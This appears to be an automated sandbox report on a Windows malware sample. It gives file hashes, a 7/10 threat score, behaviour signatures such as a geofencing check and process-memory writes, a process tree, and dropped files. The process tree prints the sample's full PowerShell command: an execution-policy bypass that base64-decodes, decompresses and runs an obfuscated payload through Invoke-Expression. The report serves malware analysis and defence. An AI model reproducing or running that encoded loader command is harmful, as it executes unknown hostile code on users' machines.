Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-05-2024 08:53

General

  • Target

    33c585ac269f682217e55bacc9eb9322_JaffaCakes118.exe

  • Size

    123KB

  • MD5

    33c585ac269f682217e55bacc9eb9322

  • SHA1

    733ea43764f5db7ccb128dda4c51ee02228be97d

  • SHA256

    80b4d96426339604f1e3b10fc0ce58bd465568a3ed2ce810b807e0503307123e

  • SHA512

    2c349cbfdeb0066925a8c445ec2c18eabd206c832ee7c43ea8954ec25c8369673389323cde77d47a41e00a01ac01e346fce3e273e74896c44df678d2ffdd271e

  • SSDEEP

    3072:RA2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcXDc:rbJhs7QW69hd1MMdxPe9N9uA0hu9TBGc

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\33c585ac269f682217e55bacc9eb9322_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\33c585ac269f682217e55bacc9eb9322_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:968
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\37AA.tmp\37AB.tmp\37AC.bat C:\Users\Admin\AppData\Local\Temp\33c585ac269f682217e55bacc9eb9322_JaffaCakes118.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3908
      • C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe
        C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -NonI -NoProfile -Exec Bypass -Command -NoLogo "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"zVZtb9pIEP7OrxhZPtVusGMD5ZJYSE1J09KWNBdI0juEqsVeYMt611mvEyjlv98Ym7f0S9UPpxMS9q5n9pmXZ2bWfIAWvDYqgwvOO3EilbaMGVWC8nrNjTg37CEk2YizEFJNND7oXON36Ah9rRXcMaUzws85l6FV7vHkPIoUTdMqZExoiJ567DstF+NCFo+Sor9IdtvXSmoaajv4bVvaihJN+1N8RDtbivW51oqNMk33jNIknBWWbYVxT+mt9dvta6JITBFrq7zGQhcuOZnsSxZonQjdMF5X2Niy3lHt3Hc7n0ff0Dtw2pykKdwzUa99RZdDBJLKdq+yeETV5/EnOWEh4dsvKTgTCr4Ny8rgzULTwXBoXvWv+4qINGa6VfVfNk6C/a2BN2x5c/9NsJVPaShF9FzlcHerZQp5HubYLXNMeEqDvloszZ4MZ1S3ruiTUzpyRbVb7Kbl0xrs75VBvCQx44vh2RlGiCoUeJJqVh38rJ1zAcUuJhjpw+85MWQoeSlxGyV2UBrktqUQaI31IkvdREruCp24Uk1eVP1a3Q4Gd5JFw41wj4rI2g/Vc4EbGlL2SA9lVsjVcLrci4tWGV0FpspEX2rCW15wKdVbEk4tsyMiOgcm4CAjDc91G/WhvdzpbN9e1l41jwo9PHPMVKr7LKYtay/WFzmtcdPyTz2v6uPPW/8Gmw8fmYjy0OjQtvPIdxnnrEhwag1uMfbNxtDaYfqe56Fkby0RrEnv9DilCTgpNIqUI34elv9RzkuLfjHpG+ki64ds/0lom/nncjtQLlNq/S4bnhXbrxICGwhY/x0TwIEdA9eNpwGOVLD1Nm9DOidHhFPDOH/Tvnh7+e5958PHT92rz9d/3fT6t3f3X/7+h4zCiI4nU/ZtxmMhkwc8M3t8mi++e5iixqvmnyenhtuX7SlR50qRhWVXxpkI844KoWU+2ktQVGfY2y1rgB0X2xiYj4ca8AO6lKSZopvoOL0sRl+yGP4AbGaeBw59gNOavdqdrmFpjnPrjcB33fqPscSGHU4duT4Cvx21wIwG1gTbNqYrkjE4MZmzGE81I/cTFRM9tYeroLTPHAd7p1NYQlL0blgOSG7o0JwjHP4dgfl1FQDSEU2Yo/XY3nWJC0tLYJbLxc0a13YFzjek3GoPYLIEtBgskyHRTAYO19Bs4NvREbJpikg6MGc5YIQINAAoHUQVvqbiDOXSXGCaW8QDyDmGMU9tzO4m6iiBsOXCOH38cmugm0WJUvXIQnotMS1dIsiEKiRcvktVmyrNxjjANL0jnEXrEdkmnI9w1CLmclMtMS72aN1bpJrGbn78PR21OaNCBxUzdt/jMKVq3VksI0upchBPaKMKRld+R26T44brof0yThBsxNHjbq/zFpquH+RTNpJPKVz1bQNLWSDoJIDNXAQzycMQuxfySXBJIqwhYhlTrZP07PjYP625fvPE9b1T1/fPTrBQjk1hgF0xJeqhRU7enZAdNB/dF3TMBFvnyHwA5wrvC2Csx7wBjsBVmpCQFoP/sswmDvcEbwN6qrKKOW+Z8uzs4D7lVc2kZFzVm9fRAnw0POxeZcBuMqGxVN11o5VJmZrU7RKVTgnHvLRlsrDMpApeFQbFLQXLf46VhIt6zbLtKmxBctdQZf8alTcXc150mbziZKYdkXGkzcHUKPvHSbPheWWLXP0L\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2600

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\37AA.tmp\37AB.tmp\37AC.bat
    Filesize

    3KB

    MD5

    0aa3bb1c948dbc63509489e853b633bd

    SHA1

    e29034d6dad8695540694b44c54c8ba656bae30e

    SHA256

    de759c2e84ea017004653a905ad84e9b6ee4aa145db8a0a895d9a33c8a8748aa

    SHA512

    0c1e5a86d71fe2f254921c1a589844d29ee8fe17fceeb53ee328ce5063eb2b659bf869d621f0ef1bc65722bcfa8b22082f644c425fab930810c62deef8120eb2

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q0vtk2by.u1k.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2600-25-0x00000000707C0000-0x000000007080C000-memory.dmp
    Filesize

    304KB

  • memory/2600-48-0x00000000749A0000-0x0000000075150000-memory.dmp
    Filesize

    7.7MB

  • memory/2600-2-0x00000000749AE000-0x00000000749AF000-memory.dmp
    Filesize

    4KB

  • memory/2600-6-0x0000000004BF0000-0x0000000004C12000-memory.dmp
    Filesize

    136KB

  • memory/2600-8-0x0000000005480000-0x00000000054E6000-memory.dmp
    Filesize

    408KB

  • memory/2600-7-0x0000000004D10000-0x0000000004D76000-memory.dmp
    Filesize

    408KB

  • memory/2600-3-0x00000000024D0000-0x0000000002506000-memory.dmp
    Filesize

    216KB

  • memory/2600-18-0x00000000055F0000-0x0000000005944000-memory.dmp
    Filesize

    3.3MB

  • memory/2600-19-0x0000000005A90000-0x0000000005AAE000-memory.dmp
    Filesize

    120KB

  • memory/2600-20-0x0000000005AC0000-0x0000000005B0C000-memory.dmp
    Filesize

    304KB

  • memory/2600-21-0x00000000073E0000-0x0000000007A5A000-memory.dmp
    Filesize

    6.5MB

  • memory/2600-22-0x0000000005FD0000-0x0000000005FEA000-memory.dmp
    Filesize

    104KB

  • memory/2600-5-0x0000000004DA0000-0x00000000053C8000-memory.dmp
    Filesize

    6.2MB

  • memory/2600-4-0x00000000749A0000-0x0000000075150000-memory.dmp
    Filesize

    7.7MB

  • memory/2600-41-0x0000000006FD0000-0x0000000006FE1000-memory.dmp
    Filesize

    68KB

  • memory/2600-37-0x00000000749A0000-0x0000000075150000-memory.dmp
    Filesize

    7.7MB

  • memory/2600-24-0x00000000749A0000-0x0000000075150000-memory.dmp
    Filesize

    7.7MB

  • memory/2600-23-0x0000000006CE0000-0x0000000006D12000-memory.dmp
    Filesize

    200KB

  • memory/2600-38-0x0000000006E50000-0x0000000006E5A000-memory.dmp
    Filesize

    40KB

  • memory/2600-39-0x00000000749A0000-0x0000000075150000-memory.dmp
    Filesize

    7.7MB

  • memory/2600-40-0x00000000070D0000-0x0000000007166000-memory.dmp
    Filesize

    600KB

  • memory/2600-36-0x0000000006D60000-0x0000000006E03000-memory.dmp
    Filesize

    652KB

  • memory/2600-42-0x0000000007000000-0x000000000700E000-memory.dmp
    Filesize

    56KB

  • memory/2600-43-0x0000000007030000-0x0000000007044000-memory.dmp
    Filesize

    80KB

  • memory/2600-44-0x0000000007070000-0x000000000708A000-memory.dmp
    Filesize

    104KB

  • memory/2600-45-0x0000000007050000-0x0000000007058000-memory.dmp
    Filesize

    32KB

  • memory/2600-35-0x0000000006D20000-0x0000000006D3E000-memory.dmp
    Filesize

    120KB